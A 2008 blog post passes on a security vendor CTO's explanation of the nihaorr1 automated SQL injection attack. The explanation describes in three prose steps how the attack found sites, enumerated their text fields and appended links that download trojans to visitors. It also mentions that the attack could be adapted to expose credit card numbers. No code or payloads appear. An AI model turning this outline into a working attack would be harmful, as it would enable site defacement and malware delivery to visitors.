Tuesday, 29 April 2008

nihaorr1 attack explained

I went and introduced myself to the guys at Secerno again at InfoSec last week, and whilst I have no professional affiliation with them, I'm always interested in exciting technology which does something new. Steve Moyle, CTO, is a friendly guy who oozes enthusiasm, just as Paul Galwas was when I met him last year. I just got a mail from Steve to tell me about a recent attack, and I thought it was so well explained I offered to reproduce it here. Steve agreed, so here goes:

"The nihaorr1 attack trashed web facing databases all over the planet last week. It was based on an automated SQL Injection attack (Secerno stops these). Previous attacks like this were targeted and individual. It was only a matter of time before someone sinister worked out how to automate it. We were working with a victim not long after the outbreak.

In this attack, they were not stealing data. However, for the affected web sites it would be difficult for anyone claiming PCI compliance that they had their data under control. The attack can easily be rewritten to take integer values (e.g. credit card numbers) from one field (say) and copy them to a text field, and then expose them on web pages ...

Basically, the attack worked as follows:

Step 1: potentially vulnerable sites identified automatically (probably by a Google query)

Step 2: SQL Injection part 1. SQL injection at a site to ask the database for every field it has that contains text

Step 3: SQL Injection part 2. Update every text item in the database with the original item plus a link that will download a trojan to the web browser

Now what happens is that when a web site serves up a page, the text it serves up is called up from its database -- but every piece of text now has a malicious link under it. When clicked on, the link serves up a virus that infects the viewer of the web page.

Note that the original victim -- the web site -- has become the attacker. Whilst the new victim is the website visitor who trusts the site.

This attack will be adapted and will cause real chaos."

Thanks Steve for the entertaining story and explanation of how this attack is working. And, as the Romans say, caveat emptor internettus.

No comments: